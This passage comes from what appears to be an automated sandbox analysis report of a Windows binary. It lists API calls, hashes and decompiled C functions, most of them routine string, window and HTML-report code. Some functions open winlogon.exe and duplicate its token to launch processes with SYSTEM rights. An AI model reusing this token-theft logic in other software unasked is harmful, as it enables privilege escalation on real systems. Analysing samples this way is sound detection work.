                                                                                                                    0x00405c4b
                                                                                                                    0x00405c4c
                                                                                                                    0x00405c52
                                                                                                                    0x00405c53
                                                                                                                    0x00000000
                                                                                                                    0x00405bf8
                                                                                                                    0x00405c02
                                                                                                                    0x00405c0e
                                                                                                                    0x00405c13
                                                                                                                    0x00405c18
                                                                                                                    0x00405c2c
                                                                                                                    0x00405c2e
                                                                                                                    0x00405c3b
                                                                                                                    0x00405c3c
                                                                                                                    0x00405c42
                                                                                                                    0x00000000
                                                                                                                    0x00405c1a
                                                                                                                    0x00405c25
                                                                                                                    0x00405c2a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405c2a
                                                                                                                    0x00405c18
                                                                                                                    0x00405bbf
                                                                                                                    0x00405bc0
                                                                                                                    0x00405bcd
                                                                                                                    0x00405bce
                                                                                                                    0x00405bd7
                                                                                                                    0x00405c58
                                                                                                                    0x00405c5f
                                                                                                                    0x00405c61
                                                                                                                    0x00405c61
                                                                                                                    0x00405c63
                                                                                                                    0x00405cdb
                                                                                                                    0x00405cdb
                                                                                                                    0x00405c65
                                                                                                                    0x00405c65
                                                                                                                    0x00405c74
                                                                                                                    0x00000000
                                                                                                                    0x00405c84
                                                                                                                    0x00405c8a
                                                                                                                    0x00405c8d
                                                                                                                    0x00405c99
                                                                                                                    0x00405caf
                                                                                                                    0x00405cbd
                                                                                                                    0x00405cc8
                                                                                                                    0x00405cd4
                                                                                                                    0x00405cd9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405cd9
                                                                                                                    0x00405c74
                                                                                                                    0x00405c63
                                                                                                                    0x00405ce6

                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                    • wcscpy.MSVCRT ref: 00405C02
                                                                                                                      • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                                                                      • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                                                                    • wcslen.MSVCRT ref: 00405C20
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                    • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                    • memcpy.MSVCRT ref: 00405C99
                                                                                                                      • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                                                                      • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                                                                      • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                                                                      • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                    • String ID: strings
                                                                                                                    • API String ID: 3166385802-3030018805
                                                                                                                    • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                    • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
                                                                                                                    • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                    • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00401E44, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 75%
                                                                                                                    			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
				char _v8;
				void* _v12;
				void* __esi;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_v8 = 0;
				_t18 = OpenProcess(0x2000000, 0, _a8);
				_v12 = _t18;
				if(_t18 == 0) {
					_t37 = GetLastError();
				} else {
					_t39 = _a4 + 0x800;
					_a8 = 0;
					E0040289F(_t39);
					_t22 =  *((intOrPtr*)(_t39 + 4));
					if(_t22 == 0) {
						_t23 = 0;
					} else {
						_t23 =  *_t22(_v12, 2,  &_a8);
					}
					if(_t23 == 0) {
						_t37 = GetLastError();
					} else {
						_a4 = _a8;
						E0040289F(_t39);
						_t40 =  *((intOrPtr*)(_t39 + 8));
						if(_t40 == 0) {
							_t28 = 0;
						} else {
							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
						}
						if(_t28 == 0) {
							_t37 = GetLastError();
						} else {
							 *_a12 = _v8;
							_t37 = 0;
						}
						CloseHandle(_a8);
					}
					CloseHandle(_v12);
				}
				return _t37;
			}













                                                                                                                    0x00401e59
                                                                                                                    0x00401e5c
                                                                                                                    0x00401e64
                                                                                                                    0x00401e67
                                                                                                                    0x00401ef9
                                                                                                                    0x00401e6d
                                                                                                                    0x00401e70
                                                                                                                    0x00401e76
                                                                                                                    0x00401e79
                                                                                                                    0x00401e7e
                                                                                                                    0x00401e83
                                                                                                                    0x00401e92
                                                                                                                    0x00401e85
                                                                                                                    0x00401e8e
                                                                                                                    0x00401e8e
                                                                                                                    0x00401e96
                                                                                                                    0x00401ee6
                                                                                                                    0x00401e98
                                                                                                                    0x00401e9b
                                                                                                                    0x00401e9e
                                                                                                                    0x00401ea3
                                                                                                                    0x00401ea8
                                                                                                                    0x00401ebb
                                                                                                                    0x00401eaa
                                                                                                                    0x00401eb7
                                                                                                                    0x00401eb7
                                                                                                                    0x00401ebf
                                                                                                                    0x00401ed3
                                                                                                                    0x00401ec1
                                                                                                                    0x00401ec7
                                                                                                                    0x00401ec9
                                                                                                                    0x00401ec9
                                                                                                                    0x00401ed8
                                                                                                                    0x00401ed8
                                                                                                                    0x00401eeb
                                                                                                                    0x00401eeb
                                                                                                                    0x00401f01

                                                                                                                    APIs
                                                                                                                    • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                                                                      • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                      • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                      • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                      • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                      • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                                                                    • String ID: winlogon.exe
                                                                                                                    • API String ID: 1315556178-961692650
                                                                                                                    • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                    • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                                                                    • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                    • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00405236, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 79%
                                                                                                                    			E00405236(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 2;
				do {
					_push( *_t52);
					_t6 = _t52 - 4; // 0xe80040cb
					_push( *_t6);
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040B1EC();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}















                                                                                                                    0x00405241
                                                                                                                    0x00405250
                                                                                                                    0x00405257
                                                                                                                    0x0040525f
                                                                                                                    0x00405262
                                                                                                                    0x00405265
                                                                                                                    0x00405268
                                                                                                                    0x0040526f
                                                                                                                    0x0040526f
                                                                                                                    0x00405277
                                                                                                                    0x00405277
                                                                                                                    0x0040527a
                                                                                                                    0x0040527f
                                                                                                                    0x00405284
                                                                                                                    0x00405285
                                                                                                                    0x00405291
                                                                                                                    0x00405296
                                                                                                                    0x004052a9
                                                                                                                    0x004052b3
                                                                                                                    0x004052b7
                                                                                                                    0x004052bc
                                                                                                                    0x004052ca
                                                                                                                    0x004052d2
                                                                                                                    0x004052d5
                                                                                                                    0x004052d8
                                                                                                                    0x004052d8
                                                                                                                    0x004052db
                                                                                                                    0x004052db
                                                                                                                    0x004052e1
                                                                                                                    0x004052e4
                                                                                                                    0x004052e8
                                                                                                                    0x004052f2

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                    • String ID: %s (%s)
                                                                                                                    • API String ID: 3979103747-1363028141
                                                                                                                    • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                    • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                                                                    • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                    • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040614F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 78%
                                                                                                                    			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040B550(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040B278();
					if(_t26 != 0) {
						E00406025(_t34,  &_v8712);
					}
				}
				return 1;
			}









                                                                                                                    0x00406157
                                                                                                                    0x0040616d
                                                                                                                    0x00406174
                                                                                                                    0x0040617f
                                                                                                                    0x00406185
                                                                                                                    0x00406196
                                                                                                                    0x0040619e
                                                                                                                    0x004061b6
                                                                                                                    0x004061bd
                                                                                                                    0x004061d4
                                                                                                                    0x004061da
                                                                                                                    0x004061e0
                                                                                                                    0x004061e5
                                                                                                                    0x004061e6
                                                                                                                    0x004061ef
                                                                                                                    0x004061f9
                                                                                                                    0x004061ff
                                                                                                                    0x004061ef
                                                                                                                    0x00406206

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                    • String ID: sysdatetimepick32
                                                                                                                    • API String ID: 1028950076-4169760276
                                                                                                                    • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                    • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                                                                    • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                    • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00404706, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52librarywindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 68%
                                                                                                                    			E00404706(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40c4e8);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}








                                                                                                                    0x00404706
                                                                                                                    0x00404714
                                                                                                                    0x0040471c
                                                                                                                    0x00404721
                                                                                                                    0x0040472b
                                                                                                                    0x00404733
                                                                                                                    0x00404735
                                                                                                                    0x00404735
                                                                                                                    0x00404733
                                                                                                                    0x00404751
                                                                                                                    0x00404780
                                                                                                                    0x00404753
                                                                                                                    0x0040475e
                                                                                                                    0x00404766
                                                                                                                    0x0040476c
                                                                                                                    0x00404770
                                                                                                                    0x00404770
                                                                                                                    0x0040478a

                                                                                                                    APIs
                                                                                                                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                                                                    • wcslen.MSVCRT ref: 00404756
                                                                                                                    • wcscpy.MSVCRT ref: 00404766
                                                                                                                    • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                                                                    • wcscpy.MSVCRT ref: 00404780
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                    • String ID: netmsg.dll
                                                                                                                    • API String ID: 2767993716-3706735626
                                                                                                                    • Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                    • Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
                                                                                                                    • Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                    • Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040598B, Relevance: 12.1, APIs: 8, Instructions: 96COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				char _v72;
				void _v582;
				long _v584;
				void* __edi;
				intOrPtr _t27;
				wchar_t* _t34;
				wchar_t* _t42;
				long* _t43;
				int _t44;
				void* _t52;
				void* _t54;
				long _t56;
				long* _t57;
				void* _t60;

				_t60 = __eflags;
				_t52 = __edx;
				E004095AB( &_v72);
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				E004095FD(_t52, _t60,  &_v72);
				_t27 = 0;
				_v12 = 0;
				if(_v20 <= 0) {
					L10:
					_t56 = 0;
				} else {
					do {
						_t57 = E00405A92(_t27,  &_v32);
						if(E00409A94( *_t57,  &_v584) == 0) {
							goto L9;
						} else {
							_t34 =  &_v584;
							_push(_t34);
							_push(_a4);
							L0040B278();
							if(_t34 == 0) {
								L5:
								_t44 = 0;
								_t54 = OpenProcess(0x2000000, 0,  *_t57);
								if(_t54 == 0) {
									goto L9;
								} else {
									_v16 = _v16 & 0;
									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
										_t44 = 1;
										CloseHandle(_v16);
									}
									CloseHandle(_t54);
									if(_t44 != 0) {
										_t56 =  *_t57;
									} else {
										goto L9;
									}
								}
							} else {
								_t42 = wcschr( &_v584, 0x5c);
								if(_t42 == 0) {
									goto L9;
								} else {
									_t43 =  &(_t42[0]);
									_push(_t43);
									_push(_a4);
									L0040B278();
									if(_t43 != 0) {
										goto L9;
									} else {
										goto L5;
									}
								}
							}
						}
						goto L12;
						L9:
						_t27 = _v12 + 1;
						_v12 = _t27;
					} while (_t27 < _v20);
					goto L10;
				}
				L12:
				E004095DA( &_v72);
				return _t56;
			}





















                                                                                                                    0x0040598b
                                                                                                                    0x0040598b
                                                                                                                    0x0040599a
                                                                                                                    0x004059ae
                                                                                                                    0x004059b5
                                                                                                                    0x004059c1
                                                                                                                    0x004059c6
                                                                                                                    0x004059cb
                                                                                                                    0x004059ce
                                                                                                                    0x00405a7b
                                                                                                                    0x00405a7b
                                                                                                                    0x004059d4
                                                                                                                    0x004059d4
                                                                                                                    0x004059dc
                                                                                                                    0x004059ee
                                                                                                                    0x00000000
                                                                                                                    0x004059f0
                                                                                                                    0x004059f0
                                                                                                                    0x004059f6
                                                                                                                    0x004059f7
                                                                                                                    0x004059fa
                                                                                                                    0x00405a03
                                                                                                                    0x00405a2b
                                                                                                                    0x00405a2e
                                                                                                                    0x00405a3c
                                                                                                                    0x00405a40
                                                                                                                    0x00000000
                                                                                                                    0x00405a42
                                                                                                                    0x00405a42
                                                                                                                    0x00405a54
                                                                                                                    0x00405a59
                                                                                                                    0x00405a5a
                                                                                                                    0x00405a5a
                                                                                                                    0x00405a61
                                                                                                                    0x00405a69
                                                                                                                    0x00405a7f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405a69
                                                                                                                    0x00405a05
                                                                                                                    0x00405a0e
                                                                                                                    0x00405a17
                                                                                                                    0x00000000
                                                                                                                    0x00405a19
                                                                                                                    0x00405a19
                                                                                                                    0x00405a1c
                                                                                                                    0x00405a1d
                                                                                                                    0x00405a20
                                                                                                                    0x00405a29
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405a29
                                                                                                                    0x00405a17
                                                                                                                    0x00405a03
                                                                                                                    0x00000000
                                                                                                                    0x00405a6b
                                                                                                                    0x00405a6e
                                                                                                                    0x00405a72
                                                                                                                    0x00405a72
                                                                                                                    0x00000000
                                                                                                                    0x004059d4
                                                                                                                    0x00405a81
                                                                                                                    0x00405a84
                                                                                                                    0x00405a8f

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 004059B5
                                                                                                                      • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                                                      • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                                                                      • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                      • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                      • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                      • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                                                                      • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
                                                                                                                      • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                      • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                                                                      • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                      • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                      • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                    • _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                    • wcschr.MSVCRT ref: 00405A0E
                                                                                                                    • _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                    • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 768606695-0
                                                                                                                    • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                    • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                                                                    • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                    • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00407639, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 64%
                                                                                                                    			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t95;
				intOrPtr* _t98;
				void* _t100;
				void* _t102;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t102 = _t100 + 0x18;
				asm("movsw");
				E00407343(__ebx, _a4, L"<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t98 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
						E0040ADC0(_v28,  &_v108);
						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
						_t67 =  *(_t73 + 0x64);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
						}
						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
						_push( *((intOrPtr*)(_t73 + 0x68)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x60)));
						L0040B1EC();
						_t102 = _t102 + 0x1c;
						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
				}
				return E00407343(_t73, _a4, L"\r\n");
			}























                                                                                                                    0x00407639
                                                                                                                    0x00407646
                                                                                                                    0x00407647
                                                                                                                    0x00407654
                                                                                                                    0x0040765f
                                                                                                                    0x0040765f
                                                                                                                    0x0040766b
                                                                                                                    0x0040766d
                                                                                                                    0x00407672
                                                                                                                    0x00407677
                                                                                                                    0x0040767d
                                                                                                                    0x00407680
                                                                                                                    0x00407686
                                                                                                                    0x00407691
                                                                                                                    0x00407697
